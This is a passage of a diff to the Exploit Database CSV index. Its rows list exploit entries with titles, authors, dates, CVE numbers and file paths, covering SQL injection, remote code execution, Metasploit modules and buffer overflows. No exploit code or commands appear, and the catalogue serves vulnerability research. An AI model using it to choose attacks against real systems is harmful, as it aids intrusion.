39236,exploits/multiple/webapps/39236.py,"Manage Engine Application Manager 12.5 - Arbitrary Command Execution",2016-01-14,"Bikramaditya Guha",webapps,multiple,,2016-01-14,2016-01-14,0,OSVDB-133027,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5291.php
@ -12905,6 +12915,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
32693,exploits/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' / 'Safe_Mode()' Restriction Bypass",2008-12-31,Mr.SaFa7,local,php,,2008-12-31,2014-04-04,1,OSVDB-106968,,,,,https://www.securityfocus.com/bid/33073/info
29712,exploits/php/local/29712.txt,"Zend Platform 2.2.1 - 'PHP.INI' File Modification",2007-03-03,"Stefan Esser",local,php,,2007-03-03,2013-11-20,1,CVE-2007-1369;OSVDB-33930,,,,,https://www.securityfocus.com/bid/22802/info
29785,exploits/php/remote/29785.txt,"aBitWhizzy - 'whizzypic.php?d' Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,remote,php,,2007-03-14,2013-11-22,1,CVE-2007-1773;OSVDB-34505,,,,,https://www.securityfocus.com/bid/23167/info
51844,exploits/php/remote/51844.txt,"AC Repair and Services System v1.0 - Multiple SQL Injection",2024-03-03,"Gnanaraj Mauviel",remote,php,,2024-03-03,2024-03-03,0,,,,,,
18898,exploits/php/remote/18898.rb,"Active Collab 'chat module' < 2.3.8 - Remote PHP Code Injection (Metasploit)",2012-05-19,Metasploit,remote,php,,2012-05-19,2012-05-19,1,OSVDB-81966;CVE-2012-6554,"Metasploit Framework (MSF)",,,,
47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php,,2019-08-13,2019-08-13,0,,Malware,,,,
47256,exploits/php/remote/47256.rb,"Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)",2019-08-14,"Ege Balci",remote,php,,2019-08-14,2019-08-14,0,,"Metasploit Framework (MSF)",,,,
@ -12941,6 +12952,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45227,exploits/php/remote/45227.php,"Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution",2018-08-20,mr_me,remote,php,,2018-08-20,2018-08-21,1,CVE-2018-15576,Remote,,,,https://srcincite.io/pocs/cve-2018-15576.php.txt
46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,,2019-03-13,2019-03-28,1,CVE-2019-9194,"Metasploit Framework (MSF)",,,http://www.exploit-db.comelFinder-2.1.47.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a4c1181b9f81869b7b1df62affbc9554e828f81c/modules/exploits/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.rb
46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,,2019-03-13,2019-03-28,1,CVE-2019-9194,"Command Injection",,,http://www.exploit-db.comelFinder-2.1.47.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a4c1181b9f81869b7b1df62affbc9554e828f81c/modules/exploits/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.rb
51845,exploits/php/remote/51845.txt,"Enrollment System v1.0 - SQL Injection",2024-03-03,"Gnanaraj Mauviel",remote,php,,2024-03-03,2024-03-03,0,,,,,,
51749,exploits/php/remote/51749.TXT,"Equipment Rental Script-1.0 - SQLi",2024-01-29,nu11secur1ty,remote,php,,2024-01-29,2024-01-29,0,,,,,,
24018,exploits/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload (Metasploit)",2013-01-10,Metasploit,remote,php,,2013-01-10,2013-01-10,1,OSVDB-88751,"Metasploit Framework (MSF)",,,,
51813,exploits/php/remote/51813.txt,"FAQ Management System v1.0 - 'faq' SQL Injection",2024-02-26,SoSPiro,remote,php,,2024-02-26,2024-02-26,0,,,,,,
@ -12994,6 +13006,10 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35731,exploits/php/remote/35731.rb,"Pandora FMS 3.1 - Authentication Bypass / Arbitrary File Upload (Metasploit)",2015-01-08,Metasploit,remote,php,80,2015-01-08,2016-10-27,1,CVE-2010-4279;OSVDB-69549,"Metasploit Framework (MSF)",,,,
20168,exploits/php/remote/20168.pl,"pBot - Remote Code Execution",2012-08-01,bwall,remote,php,,2012-08-01,2012-08-28,0,OSVDB-84913,,,,,
30928,exploits/php/remote/30928.php,"PDFlib 7.0.2 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-24,poplix,remote,php,,2007-12-24,2014-01-15,1,CVE-2007-6561;OSVDB-40275,,,,,http://www.bugreport.ir/?/23
51838,exploits/php/remote/51838.txt,"Petrol Pump Management Software v.1.0 - SQL Injection",2024-03-03,"Shubham Pandey",remote,php,,2024-03-03,2024-03-03,0,CVE-2024-27746,,,,,
51837,exploits/php/remote/51837.txt,"Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file",2024-03-03,"Shubham Pandey",remote,php,,2024-03-03,2024-03-03,0,CVE-2024-27744,,,,,
51836,exploits/php/remote/51836.txt,"Petrol Pump Management Software v1.0 - 'Address' Stored Cross Site Scripting",2024-03-03,"Shubham Pandey",remote,php,,2024-03-03,2024-03-03,0,CVE-2024-27743,,,,,
51839,exploits/php/remote/51839.txt,"Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload",2024-03-03,"Shubham Pandey",remote,php,,2024-03-03,2024-03-03,0,CVE-2024-27747,,,,,
34985,exploits/php/remote/34985.txt,"pfSense 2 Beta 4 - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-05,"dave b",remote,php,,2010-11-05,2014-10-17,1,CVE-2010-4246;OSVDB-69080,,,,,https://www.securityfocus.com/bid/44738/info
43341,exploits/php/remote/43341.rb,"pfSense 2.4.1 - Cross-Site Request Forgery Error Page Clickjacking (Metasploit)",2017-12-14,Metasploit,remote,php,,2017-12-14,2017-12-16,1,,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/37514eec1708e9e1c4f0c90ca39a27bfee34699f/modules/exploits/unix/http/pfsense_clickjacking.rb
40294,exploits/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,remote,php,80,2016-08-23,2017-11-16,1,,"Metasploit Framework (MSF)",,,,
@ -13074,6 +13090,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
29325,exploits/php/remote/29325.rb,"ProcessMaker Open Source - (Authenticated) PHP Code Execution (Metasploit)",2013-10-31,Metasploit,remote,php,80,2013-10-31,2013-10-31,1,OSVDB-99201;OSVDB-99200;OSVDB-99199,"Metasploit Framework (MSF)",,,,
35660,exploits/php/remote/35660.rb,"ProjectSend - Arbitrary File Upload (Metasploit)",2014-12-31,Metasploit,remote,php,80,2014-12-31,2014-12-31,1,OSVDB-116469;CVE-2014-9567,"Metasploit Framework (MSF)",,,http://www.exploit-db.comProjectSend-r561.zip,
31479,exploits/php/remote/31479.txt,"Quick Classifieds 1.0 - 'index.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,remote,php,,2008-03-24,2014-02-07,1,CVE-2008-6543;OSVDB-53023,,,,,https://www.securityfocus.com/bid/28417/info
51840,exploits/php/remote/51840.txt,"Real Estate Management System v1.0 - Remote Code Execution via File Upload",2024-03-03,"Diyar Saadi",remote,php,,2024-03-03,2024-03-03,0,,,,,,
36264,exploits/php/remote/36264.rb,"Seagate Business NAS - Remote Command Execution (Metasploit)",2015-03-04,Metasploit,remote,php,80,2015-03-04,2017-04-01,1,CVE-2014-8686;CVE-2014-8684;OSVDB-118925;CVE-2014-8687,"Metasploit Framework (MSF)",,,,https://beyondbinary.io/advisory/seagate-nas-rce/
32359,exploits/php/remote/32359.txt,"SePortal 2.5 - SQL Injection (2)",2014-03-19,jsass,remote,php,,2014-03-19,2016-12-14,1,CVE-2008-5191;OSVDB-46567,,,http://www.exploit-db.com/screenshots/idlt32500/screen-shot-2014-03-19-at-154614.png,http://www.exploit-db.comseportal2.5.zip,
32621,exploits/php/remote/32621.rb,"SePortal 2.5 - SQL Injection / Remote Code Execution (Metasploit)",2014-03-31,Metasploit,remote,php,80,2014-03-31,2016-12-14,1,CVE-2008-5191;OSVDB-46567,"Metasploit Framework (MSF)",,,http://www.exploit-db.comseportal2.5.zip,
@ -13081,6 +13098,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,,2019-05-23,2019-05-23,1,CVE-2017-18357,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
31264,exploits/php/remote/31264.rb,"Simple E-document - Arbitrary File Upload (Metasploit)",2014-01-29,Metasploit,remote,php,80,2014-01-29,2014-01-29,1,OSVDB-102635,"Metasploit Framework (MSF)",,,,
51808,exploits/php/remote/51808.txt,"Simple Inventory Management System v1.0 - 'email' SQL Injection",2024-02-26,SoSPiro,remote,php,,2024-02-26,2024-02-26,0,,,,,,
51842,exploits/php/remote/51842.txt,"Simple Student Attendance System v1.0 - 'classid' Time Based Blind & Union Based SQL Injection",2024-03-03,"Gnanaraj Mauviel",remote,php,,2024-03-03,2024-03-03,0,,,,,,
51841,exploits/php/remote/51841.txt,"Simple Student Attendance System v1.0 - Time Based Blind SQL Injection",2024-03-03,"Gnanaraj Mauviel",remote,php,,2024-03-03,2024-03-03,0,,,,,,
27941,exploits/php/remote/27941.rb,"SPIP - 'connect' PHP Injection (Metasploit)",2013-08-29,Metasploit,remote,php,,2013-08-29,2013-08-29,1,OSVDB-83543,"Metasploit Framework (MSF)",,,,
24902,exploits/php/remote/24902.rb,"STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,php,,2013-03-29,2017-11-14,1,OSVDB-91842,"Metasploit Framework (MSF)",,,,
24902,exploits/php/remote/24902.rb,"STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,php,,2013-03-29,2017-11-14,1,OSVDB-91842,Malware,,,,
@ -15107,6 +15126,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
26651,exploits/php/webapps/26651.txt,"BosDates 4.0 - Multiple SQL Injections",2005-11-29,r0t,webapps,php,,2005-11-29,2013-07-07,1,CVE-2005-3911;OSVDB-21173,,,,,https://www.securityfocus.com/bid/15632/info
23685,exploits/php/webapps/23685.txt,"BosDev BosDates 3.x - SQL Injection",2004-02-11,G00db0y,webapps,php,,2004-02-11,2012-12-27,1,CVE-2004-0275;OSVDB-3915,,,,,https://www.securityfocus.com/bid/9639/info
5446,exploits/php/webapps/5446.txt,"BosNews 4.0 - 'article' SQL Injection",2008-04-14,Crackers_Child,webapps,php,,2008-04-13,2016-11-22,1,OSVDB-49278;CVE-2008-4703,,,,,
51848,exploits/php/webapps/51848.py,"Boss Mini 1.4.0 - local file inclusion",2024-03-03,nltt0,webapps,php,,2024-03-03,2024-03-03,0,,,,,,
35451,exploits/php/webapps/35451.txt,"BoutikOne - 'categorie.php?path' SQL Injection",2011-03-14,cdx.security,webapps,php,,2011-03-14,2014-12-03,1,OSVDB-71204,,,,,https://www.securityfocus.com/bid/46861/info
16281,exploits/php/webapps/16281.txt,"BoutikOne - 'description.php' SQL Injection",2011-03-05,IRAQ_JAGUAR,webapps,php,,2011-03-05,2011-03-05,1,,,,,,
35452,exploits/php/webapps/35452.txt,"BoutikOne - 'list.php?path' SQL Injection",2011-03-14,cdx.security,webapps,php,,2011-03-14,2014-12-03,1,OSVDB-71205,,,,,https://www.securityfocus.com/bid/46861/info
@ -46254,6 +46274,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39520,exploits/windows_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation",2016-03-02,Cr4sh,local,windows_x86-64,,2016-03-02,2016-03-02,0,,,,,,https://github.com/Cr4sh/secretnet_expl
40451,exploits/windows_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",local,windows_x86-64,,2016-10-03,2016-10-03,1,,"Metasploit Framework (MSF)",,,,
40342,exploits/windows_x86-64/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",local,windows_x86-64,,2016-09-07,2016-09-07,0,,,,,,
51843,exploits/windows_x86-64/local/51843.txt,"Windows PowerShell - Event Log Bypass Single Quote Code Execution",2024-03-03,hyp3rlinx,local,windows_x86-64,,2024-03-03,2024-03-03,0,,,,,,
45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64,,2018-08-14,2018-08-14,0,CVE-2018-6892,,,,,
46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64,,2019-01-28,2019-01-29,0,CVE-2018-6892,Remote,,,http://www.exploit-db.comCloudMe_1112.exe,
46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64,,2019-01-28,2019-01-29,0,CVE-2018-6892,"Buffer Overflow",,,http://www.exploit-db.comCloudMe_1112.exe,

Can't render this file because it is too large.